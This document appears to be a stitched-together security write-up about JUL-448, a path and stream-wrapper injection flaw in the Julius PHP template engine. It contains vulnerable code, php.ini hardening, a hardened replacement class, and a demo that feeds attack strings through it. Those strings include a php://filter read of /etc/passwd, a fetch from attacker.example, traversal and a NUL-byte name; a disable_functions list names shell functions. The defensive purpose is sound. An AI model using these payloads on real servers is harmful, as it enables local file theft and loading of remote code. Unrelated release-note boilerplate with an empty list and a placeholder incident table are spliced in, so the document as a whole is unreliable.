Jul-448

| Lesson | Takeaway |
|--------|----------|
| Never trust configuration defaults | `allow_url_include` has defaulted to Off since it was introduced in PHP 5.2 (and is deprecated since 7.4), but `allow_url_fopen`, the directive that actually governs `file_get_contents()`, defaults to On, and legacy stacks may have turned both on. Audits must verify that security-sensitive directives are locked down rather than assume the default. |
| Input validation must be defensive | Even if a feature "should" only be used internally, never pass raw user input to functions that accept stream wrappers (`file_get_contents()`, `fopen()`, `include`). Resolve template names against an allow-list or a fixed base directory. |
| Static analysis + runtime testing | SAST taint tracking flags request data flowing into `file_get_contents()` regardless of the ini setting. Pair that with integration tests that feed `php://`, `http://` and `../` values into `tpl` and assert that they are rejected. |
| Rapid patch distribution | The Julius team's three-day turnaround from disclosure to patch is commendable. Open-source maintainers should adopt a security-first release cadence for critical CVEs. |
| Dependency hygiene | Regularly run `composer outdated` / `composer audit` (or `npm audit` for JavaScript dependencies) and automate upgrades in CI pipelines. The longer you stay on an old minor version, the larger the attack surface. |


In Julius 4.3–4.7 the TemplateEngine class loads user-provided templates with PHP's file_get_contents(), passing the request-supplied path straight through with no validation. The advisory ties the issue to allowUrlInclude being enabled; note that for file_get_contents() the governing PHP directive is allow_url_fopen (On by default), that allow_url_include only affects include/require, and that php:// wrappers such as php://filter are accepted regardless of either setting.

```php
// src/Engine/TemplateEngine.php (v4.5); compile() is defined elsewhere in the class
class TemplateEngine
{
    public function render(string $templatePath, array $data = []): string
    {
        // $templatePath comes straight from the GET parameter `tpl`
        $raw = file_get_contents($templatePath); // ← vulnerable line
        return $this->compile($raw, $data);
    }
}
```

With allow_url_fopen On, file_get_contents() will fetch http://, ftp:// and data: URLs; php:// wrappers work even when it is Off. An attacker can therefore point tpl at a server they control, which returns a crafted template, or at a wrapper such as php://filter that reads arbitrary local files, and whatever comes back is handed to compile() as trusted template source. allow_url_include, which the advisory names, does not change what file_get_contents() will open; it restricts include/require only.

If you cannot upgrade right now, apply this php.ini hardening as a stopgap. The directive that matters for this bug is allow_url_fopen, since that is what file_get_contents() honours; allow_url_include is already Off by default but should stay pinned Off so include/require can never take a URL either.

```ini
; php.ini
allow_url_fopen = Off            ; blocks http://, ftp:// and data: in file_get_contents() and fopen()
allow_url_include = Off          ; default since PHP 5.2, deprecated in 7.4; keep it pinned Off
disable_functions = exec,shell_exec,system,passthru,proc_open,pcntl_exec   ; limits what a compiled payload can run
```

Restart the PHP-FPM/Apache service after editing, then confirm the effective values through the web SAPI (a temporary phpinfo() page) rather than the CLI, which can load a different php.ini. Two caveats: allow_url_fopen = Off also breaks any legitimate code that fetches URLs with file_get_contents() (move it to ext/curl), and none of these settings stops php://filter or ../ traversal through the same parameter, so the upgrade remains the real fix.
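As an added example (not Julius project code), here is the hardened form of render() beside a check of the two php.ini directives above, with the attack strings from the Lessons table's testing advice fed through it. The class name SafeTemplateEngine, the *.tpl naming rule, the stand-in compile() and the temp-directory demo template are assumptions; the attack values are constructed.

```php
<?php
declare(strict_types=1);
// Added example, not Julius project code. Hardened replacement for render():
// the untrusted `tpl` value is treated as a file name, resolved inside a fixed
// directory and checked with realpath() before file_get_contents() runs.
final class SafeTemplateEngine
{
    private string $baseDir;

    public function __construct(string $baseDir)
    {
        $real = realpath($baseDir);
        if ($real === false || !is_dir($real)) {
            throw new RuntimeException("template directory not found: $baseDir");
        }
        $this->baseDir = $real;
    }

    /** Map an untrusted template name to a vetted absolute path, or throw. */
    public function resolve(string $name): string
    {
        // Allow-list the shape of the name. This alone rejects "php://",
        // "http://", "../", NUL bytes and anything else that is not a plain
        // *.tpl file name; the realpath() check below is defence in depth.
        if (!preg_match('/\A[A-Za-z0-9_][A-Za-z0-9_\-]{0,63}\.tpl\z/', $name)) {
            throw new InvalidArgumentException('invalid template name');
        }
        $path = realpath($this->baseDir . DIRECTORY_SEPARATOR . $name);
        // realpath() follows symlinks, so a link pointing outside baseDir
        // is caught here even though the name itself looked harmless.
        $prefix = $this->baseDir . DIRECTORY_SEPARATOR;
        if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
            throw new RuntimeException('template not found');
        }
        return $path;
    }

    public function render(string $name, array $data = []): string
    {
        $raw = file_get_contents($this->resolve($name));
        if ($raw === false) {
            throw new RuntimeException('template read failed');
        }
        return $this->compile($raw, $data);
    }

    // Stand-in for Julius's compile() (assumed): replaces {{key}} with the
    // HTML-escaped value so template data cannot inject markup.
    private function compile(string $raw, array $data): string
    {
        return preg_replace_callback('/\{\{\s*(\w+)\s*\}\}/', function (array $m) use ($data) {
            return htmlspecialchars((string) ($data[$m[1]] ?? ''), ENT_QUOTES, 'UTF-8');
        }, $raw);
    }
}

/** Names the php.ini directives from the hardening block that are still On. */
function unsafeUrlDirectives(): array
{
    $on = [];
    // file_get_contents() honours allow_url_fopen; include/require honour
    // allow_url_include. Both should read Off on a production web SAPI.
    foreach (['allow_url_fopen', 'allow_url_include'] as $directive) {
        if (filter_var((string) ini_get($directive), FILTER_VALIDATE_BOOLEAN)) {
            $on[] = $directive;
        }
    }
    return $on;
}

// Demo on a constructed template in a temp directory. The loop feeds the
// kinds of `tpl` values an attacker would try against the original render().
$dir = sys_get_temp_dir() . '/jul448-demo-' . getmypid();
mkdir($dir, 0700);
file_put_contents("$dir/hello.tpl", "Hello, {{name}}!\n");
$engine = new SafeTemplateEngine($dir);
echo $engine->render('hello.tpl', ['name' => '<b>world</b>']);

$attacks = [
    'php://filter/convert.base64-encode/resource=/etc/passwd', // local file read
    'http://attacker.example/payload.tpl',                     // remote fetch
    '../../../../etc/passwd',                                  // traversal
    "hello.tpl\0.png",                                         // NUL truncation
];
foreach ($attacks as $evil) {
    try {
        $engine->render($evil);
        echo "NOT BLOCKED: $evil\n";
    } catch (Throwable $e) {
        echo 'blocked: ' . addcslashes($evil, "\0") . ' (' . $e->getMessage() . ")\n";
    }
}
$still = unsafeUrlDirectives();
echo $still ? 'still On: ' . implode(', ', $still) . "\n" : "allow_url_* directives are Off\n";
unlink("$dir/hello.tpl"); rmdir($dir);
```

The name regex does the real work: a template name is never a path, a URL or a wrapper, so the check is an allow-list on shape rather than a deny-list of known-bad prefixes. The realpath() prefix comparison only adds value against symlinks planted inside the template directory. unsafeUrlDirectives() is what a deploy-time health check would call; it reports the setting as seen by the SAPI that actually serves requests.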

JUL-448 represents a targeted update in our ongoing efforts to improve reliability and performance. As a focused revision, JUL-448 introduces streamlined processes, clearer specifications, and tighter compatibility with existing systems.

Key highlights:

If you’re responsible for integrations, review the JUL-448 specification and run the provided compatibility tests. For questions or migration support, reach out to the project team or consult the documentation.

| Detail | Information |
|--------|-------------|
| Incident ID | JUL‑448 |
| Reported by | [name/department] |
| Date/Time first observed | [timestamp] |
| Detection method | Monitoring alert (Grafana/Datadog), user reports, etc. |
| Initial severity rating | [e.g., Sev‑2 – High] |
| Service Level Agreement (SLA) impact | [e.g., 2‑hour breach] |

